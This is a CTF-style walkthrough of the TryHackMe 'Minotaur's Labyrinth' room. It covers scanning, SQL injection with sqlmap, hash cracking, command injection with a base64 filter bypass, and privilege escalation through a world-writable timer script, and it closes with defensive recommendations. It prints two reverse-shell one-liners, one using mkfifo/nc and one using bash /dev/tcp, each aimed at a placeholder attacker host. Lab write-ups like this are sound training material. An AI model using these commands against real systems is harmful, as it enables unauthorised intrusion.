Cybersecurity, Hacking, Pentesting, Vulnerabilities
TryHackMe — Minotaur’s Labyrinth Walkthrough
A walkthrough with my tactics, techniques, and procedures.
Reconnaissance/Scanning:
I started off by scanning the network to see which ports were open/services running on the ports.
$ nmap -A -O -sC -sV -p- <machine_IP>
Running gobuster to scan for directories.
In the FTP server there’s a directory to look into.
In that directory was a hidden directory and a text file. The text file didn’t show anything important.
In the hidden directory was the first flag and another text file.
This is what the text file keep_in_mind said:
Vulnerability assessment:
The /logs directory had a log file that showed some user credentials in plaintext!
Once logged in on the main webpage, there’s a search bar that looks like it is showing potential tables or columns from a database.
I fired up burpsuite to capture a request after sending a parameter in the searchbar and used that in sqlmap.
$ sqlmap -r /path/to/request/file - batch –dump
Looks like we got some usernames and hashes!
Crackstation[.]net cracked them easily since they’re just an md5 hash!
Upon logging into the webpage, the top nav bar showed the second flag.
When viewing the source code, I saw this comment.
And up at the top, the “Secret_Stuff” link leads to /echo.php
Exploit:
Visiting that page:
Thanks to the hint from TryHackMe, it let me know which characters are filtered.
Luckily, it looks like the pipe character isn’t filtered, so I tested the command whoami piped to bash because just entering a command will get echoed.
Since so many characters are filtered, I can’t use a regular command to try to get a reverse shell.
That means I’ll have to encode it and try that way. Base64 is great for encoding.
The reverse shell one liner I used was:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local_IP> <PORT> >/tmp/f
I encoded that and removed the equal sign at the end since it was one of the filtered characters.
<encoded_text> | base64 -d | bash
After sending that, I got a reverse shell!
Checking for hidden files.
That looks like a good file to inspect!
Looks like the root credentials for the DB.
Now to see the other users in the /home directory.
In this user’s home directory was the user flag.
Privilege Escalation:
Looking for a way to escalate privileges, I didn’t have any luck looking at the cronjobs, no password so I couldn’t run `sudo -l`, and no SUID binaries I could exploit.
I started checking for hidden files or anything useful in the root directory.
That’s interesting, a directory called timers that’s writable by all users.
In one of the files on the FTP server there was mention of keeping things on a timer..
In that directory was a script that starts another bash shell.
Well, since I can write to that file I appended a reverse shell one liner to the end of it.
$ echo “bash -i >& /dev/tcp/IP_ADDRESS/8080 0>&1” >> timer.sh
Shortly after that I got a reverse shell as root.
Time to grab the root flag in the root directory.
Reporting:
- Disable anonymous login on FTP servers.
- Check data sanitization/filtered expressions on webpages.
- Ensure correct permissions are assigned on all files, especially executable files.
- Don’t store credentials in plaintext.
- Use a stronger hashing algorithm in databases to protect information.